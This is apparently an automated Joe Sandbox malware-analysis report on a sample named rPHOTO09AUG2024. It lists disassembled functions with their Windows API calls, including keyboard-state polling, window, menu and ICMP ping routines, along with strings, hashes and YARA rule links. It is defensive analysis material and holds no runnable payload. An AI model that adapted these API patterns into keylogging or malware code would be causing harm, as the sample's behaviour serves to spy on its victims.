Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: c8a9dbbf3baa6c7b2704d895be6a7deb125b3319508ccf8091ac0a36a5f1d6e8
Instruction ID: d0841c5ee45e2a6bf9cb2f78f0218169bf9652ea6e08a6adb530eac6d9c0e200
Opcode Fuzzy Hash: c8a9dbbf3baa6c7b2704d895be6a7deb125b3319508ccf8091ac0a36a5f1d6e8
Instruction Fuzzy Hash: 0DB1FE75A00209AFDB04DFA5C899DAEBBF9FF49304B148469F50AEB251DB30ED45CB60

Function 00DA052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00DA05A7
SetKeyboardState.USER32(?), ref: 00DA0612
GetAsyncKeyState.USER32(000000A0), ref: 00DA0632
GetKeyState.USER32(000000A0), ref: 00DA0649
GetAsyncKeyState.USER32(000000A1), ref: 00DA0678
GetKeyState.USER32(000000A1), ref: 00DA0689
GetAsyncKeyState.USER32(00000011), ref: 00DA06B5
GetKeyState.USER32(00000011), ref: 00DA06C3
GetAsyncKeyState.USER32(00000012), ref: 00DA06EC
GetKeyState.USER32(00000012), ref: 00DA06FA
GetAsyncKeyState.USER32(0000005B), ref: 00DA0723
GetKeyState.USER32(0000005B), ref: 00DA0731

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: e7b0791633a7e4e20c4ab95219da09a41e8539a3982b5ce91e688d8f1ea7960e
Instruction ID: 2fdc1f83f4277b0887603d6cdca28d94294e9f1689c2b0208048b010c567099b
Opcode Fuzzy Hash: e7b0791633a7e4e20c4ab95219da09a41e8539a3982b5ce91e688d8f1ea7960e
Instruction Fuzzy Hash: 2351C964E047882AFB35DBB088547EABFB59F03380F0C4599D5C25B1C2DA64EA4CCB72

Function 00D9C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00D9C746
GetWindowRect.USER32(00000000,?), ref: 00D9C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00D9C7B6
GetDlgItem.USER32(?,00000002), ref: 00D9C7C1
GetWindowRect.USER32(00000000,?), ref: 00D9C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00D9C827
GetDlgItem.USER32(?,000003E9), ref: 00D9C835
GetWindowRect.USER32(00000000,?), ref: 00D9C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00D9C889
GetDlgItem.USER32(?,000003EA), ref: 00D9C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D9C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 00D9C8C1

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 16643ddd463b24408814299e9074c7cc95dc007c625de9eb7475793beaa5f7d8
Instruction ID: fa6a6429465b81bd61918c6728b461605dfa7ccefbf89aca553779eeb8299bf6
Opcode Fuzzy Hash: 16643ddd463b24408814299e9074c7cc95dc007c625de9eb7475793beaa5f7d8
Instruction Fuzzy Hash: 0B512E71B50206ABDF18CFA9DD99EAEBBBAEB88311F14812DF515D7390D7709D008B60

Function 00D4201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D41B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D42036,?,00000000,?,?,?,?,00D416CB,00000000,?), ref: 00D41B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00D420D3
KillTimer.USER32(-00000001,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D4216E
DestroyAcceleratorTable.USER32(00000000), ref: 00D7BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BF5A
DeleteObject.GDI32(00000000), ref: 00D7BF6C

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 6a327e38fc8b43364018fab4c16d1071171195a8246744bfe89abd9bb1e098a9
Instruction ID: c74537a036f5a605678ac8fc0214484ad52cd6e60301953f20611004fa3fed17
Opcode Fuzzy Hash: 6a327e38fc8b43364018fab4c16d1071171195a8246744bfe89abd9bb1e098a9
Instruction Fuzzy Hash: 99617B31100711DFCB299F15DD48B3AB7F2FF50716F58852AE1869AAA0C772A894DF70

Function 00D421A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00D425DB: GetWindowLongW.USER32(?,000000EB), ref: 00D425EC

GetSysColor.USER32(0000000F), ref: 00D421D3

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 1b50b293a9138cfc721fe3605dc6178f4e347c60a975cbd1f6587053d037587e
Instruction ID: 06faba88a281a7e4e3da268637bc446aa8031ea4473b2d502514574a97088207
Opcode Fuzzy Hash: 1b50b293a9138cfc721fe3605dc6178f4e347c60a975cbd1f6587053d037587e
Instruction Fuzzy Hash: 6741C4310006519FDB255F28EC88BB93B66EB06331F9C8265FD65CA2E6C7718C42DB35

Function 00DAAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00DCF910), ref: 00DAAB76
GetDriveTypeW.KERNEL32(00000061,00DFA620,00000061), ref: 00DAAC40
_wcscpy.LIBCMT ref: 00DAAC6A

Strings

all, xrefs: 00DAAB7C
ramdisk, xrefs: 00DAABEA
unknown, xrefs: 00DAAC01
cdrom, xrefs: 00DAAB92
fixed, xrefs: 00DAABBE
network, xrefs: 00DAABD4
removable, xrefs: 00DAABA8

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 0237a88ecd3799e5bf6701e7353864cb7f65de38ac52949e399db24756d8a6a0
Instruction ID: 8ca0729f0751ec1c9802d176c6d519fd44a3c96fd2ef2721c2e47b023b532e76
Opcode Fuzzy Hash: 0237a88ecd3799e5bf6701e7353864cb7f65de38ac52949e399db24756d8a6a0
Instruction Fuzzy Hash: C5519D311083059BC710EF18C892AAFB7A6EF85310F148A2DF596972A2DB31DD09CB73

Function 00DCC27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623

Part of subcall function 00D42344: GetCursorPos.USER32(?), ref: 00D42357
Part of subcall function 00D42344: ScreenToClient.USER32(00E067B0,?), ref: 00D42374
Part of subcall function 00D42344: GetAsyncKeyState.USER32(00000001), ref: 00D42399
Part of subcall function 00D42344: GetAsyncKeyState.USER32(00000002), ref: 00D423A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00DCC2E4
ImageList_EndDrag.COMCTL32 ref: 00DCC2EA
ReleaseCapture.USER32 ref: 00DCC2F0
SetWindowTextW.USER32(?,00000000), ref: 00DCC39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00DCC3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00DCC48F

Strings

@GUI_DROPID, xrefs: 00DCC3E1
pr, xrefs: 00DCC3FD
@GUI_DRAGFILE, xrefs: 00DCC424
pr, xrefs: 00DCC438

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$pr$pr
API String ID: 1924731296-488423084
Opcode ID: f2167d07fc77959a8f3e57b05104d63abf1514297720def5260658a205d49b4f
Instruction ID: 25e0b5a5d6b736ede0e3c6dfb3ff5f0f8af3c2819f9339de662299fae527f602
Opcode Fuzzy Hash: f2167d07fc77959a8f3e57b05104d63abf1514297720def5260658a205d49b4f
Instruction Fuzzy Hash: FE51BE70204306AFD704DF24CC56FAA7BE5EB88310F04852DF5959B2E1DB31A998DB72

Function 00D49997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00D499C2
__swprintf.LIBCMT ref: 00D49A0C
__i64tow.LIBCMT ref: 00D7FA0F

Strings

False, xrefs: 00D7F9D7
%.15g, xrefs: 00D49A06
0x%p, xrefs: 00D7F9F1
True, xrefs: 00D7F9D0

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: cb75bb493b1a012c83267a6c54eac5d517b48e3af3480392b537bf1aa5caa928
Instruction ID: 03d2babe11e2fd8eb95456e3e4c182f38773b056a3cc6d72b88b7c0f131764f9
Opcode Fuzzy Hash: cb75bb493b1a012c83267a6c54eac5d517b48e3af3480392b537bf1aa5caa928
Instruction Fuzzy Hash: 0241A171604205AFDB249B39D842E7BB7E8EF48310F24846EE68DD7295EB71D9428F31

Function 00DC73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DC73D9
CreateMenu.USER32 ref: 00DC73F4
SetMenu.USER32(?,00000000), ref: 00DC7403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DC7490
IsMenu.USER32(?), ref: 00DC74A6
CreatePopupMenu.USER32 ref: 00DC74B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DC74DD
DrawMenuBar.USER32 ref: 00DC74E5

Strings

0, xrefs: 00DC73CF
F, xrefs: 00DC74D1

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 0b4268646a18c1701e71048dc9a04f9d7e2f37008f21ec1ce54e29d52ee8bda5
Instruction ID: 84893691d3bb8b6d63358e6f0202f63eb0013180ae1c0c298e9e7257611a9e6c
Opcode Fuzzy Hash: 0b4268646a18c1701e71048dc9a04f9d7e2f37008f21ec1ce54e29d52ee8bda5
Instruction Fuzzy Hash: E041F675A05206EFDB14DF64D884F9ABBB9FF49310F184029FA55A7360D731A924CF60

Function 00DC772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00DC77CD
CreateCompatibleDC.GDI32(00000000), ref: 00DC77D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00DC77E7
SelectObject.GDI32(00000000,00000000), ref: 00DC77EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 00DC77FA
DeleteDC.GDI32(00000000), ref: 00DC7803
GetWindowLongW.USER32(?,000000EC), ref: 00DC780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00DC7821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00DC782D

Strings

static, xrefs: 00DC7765

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 3c0aa2f0efea1804fc9c14ccfd612de0ca94df8f5a9ad3aac7807b82244a0c14
Instruction ID: 935e0324ca77f34e4ddd3822201860e5a1c48a7aa7d2c6a4ff58027d50fb63bc
Opcode Fuzzy Hash: 3c0aa2f0efea1804fc9c14ccfd612de0ca94df8f5a9ad3aac7807b82244a0c14
Instruction Fuzzy Hash: 10318C3110421BABDF129F64DC09FDA3B6AFF09720F140229FA15E62A0C731D821DBB4

Function 00D67040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D6707B

Part of subcall function 00D68D68: __getptd_noexit.LIBCMT ref: 00D68D68

__gmtime64_s.LIBCMT ref: 00D67114
__gmtime64_s.LIBCMT ref: 00D6714A
__gmtime64_s.LIBCMT ref: 00D67167
__allrem.LIBCMT ref: 00D671BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D671D9
__allrem.LIBCMT ref: 00D671F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D6720E
__allrem.LIBCMT ref: 00D67225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D67243
__invoke_watson.LIBCMT ref: 00D672B4

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: af7dd5d1deea6fd83ff1dd3acf065ac61db9f08af71cef54f0c6a63bf98f6e48
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: ED71F871A4471AABE7149E79CC52B5AB3B8FF15328F14822AF514E7281F770D9408BF4

Function 00DA2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DA2A31
GetMenuItemInfoW.USER32(00E06890,000000FF,00000000,00000030), ref: 00DA2A92
SetMenuItemInfoW.USER32(00E06890,00000004,00000000,00000030), ref: 00DA2AC8
Sleep.KERNEL32(000001F4), ref: 00DA2ADA
GetMenuItemCount.USER32(?), ref: 00DA2B1E
GetMenuItemID.USER32(?,00000000), ref: 00DA2B3A
GetMenuItemID.USER32(?,-00000001), ref: 00DA2B64
GetMenuItemID.USER32(?,?), ref: 00DA2BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DA2BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DA2C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DA2C24

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 19584687655b035dee9834f7124def0acdcbff443892d9d58d1940e5022348f1
Instruction ID: d6032e08b71731981c54dd65de62e1121b514fd1ee097a33eb60babf3b20a1db
Opcode Fuzzy Hash: 19584687655b035dee9834f7124def0acdcbff443892d9d58d1940e5022348f1
Instruction Fuzzy Hash: 8961A1B090034AAFDB11CF6ACD88EBEBBB9EB06314F180459E841A7251D731AE45DB31

Function 00DC7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DC7214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DC7217
GetWindowLongW.USER32(?,000000F0), ref: 00DC723B
_memset.LIBCMT ref: 00DC724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DC725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DC72D6

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: f3d3ed031be594b12a52bde9a7dcaf06bc4317aec7532719193830a709a75759
Instruction ID: 5847e4885d5c239b6583e35f69873c9bf9fca41cae168b5408f9cea0f20e4c39
Opcode Fuzzy Hash: f3d3ed031be594b12a52bde9a7dcaf06bc4317aec7532719193830a709a75759
Instruction Fuzzy Hash: 04617871A00249AFDB10DFA8CC81FEE77F8EB09710F14415AFA14A72A1D771AA55DFA0

Function 00D9710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D97135
SafeArrayAllocData.OLEAUT32(?), ref: 00D9718E
VariantInit.OLEAUT32(?), ref: 00D971A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 00D971C0
VariantCopy.OLEAUT32(?,?), ref: 00D97213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00D97227
VariantClear.OLEAUT32(?), ref: 00D9723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00D97249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D97252
VariantClear.OLEAUT32(?), ref: 00D97264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D9726F

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: ae7100889b3265f9278fa841784f7f46e01ca17a8f99ca5a3a5b1c63db79f30c
Instruction ID: ba3305b8d900b2a59b9818c625dfdbeb205b2f2ff149718881a0027bbb8cb78e
Opcode Fuzzy Hash: ae7100889b3265f9278fa841784f7f46e01ca17a8f99ca5a3a5b1c63db79f30c
Instruction Fuzzy Hash: 23411B75A1421AAFCF049FA4D844DEEBBB9EF48354F008069F955E7361DB30A945CBB0

Function 00DB5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00DB5AA6
inet_addr.WSOCK32(?,?,?), ref: 00DB5AEB
gethostbyname.WSOCK32(?), ref: 00DB5AF7
IcmpCreateFile.IPHLPAPI ref: 00DB5B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DB5B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DB5B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00DB5C00
WSACleanup.WSOCK32 ref: 00DB5C06

Strings

Ping, xrefs: 00DB5B29

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: c72691de33c10520a004734f766a70e9bd121afa49952d2da2ca19d547fcd962
Instruction ID: 34c61226f150f8a642075138767362d8d7c50611cd71ccbaf259d8b21a9c9f90
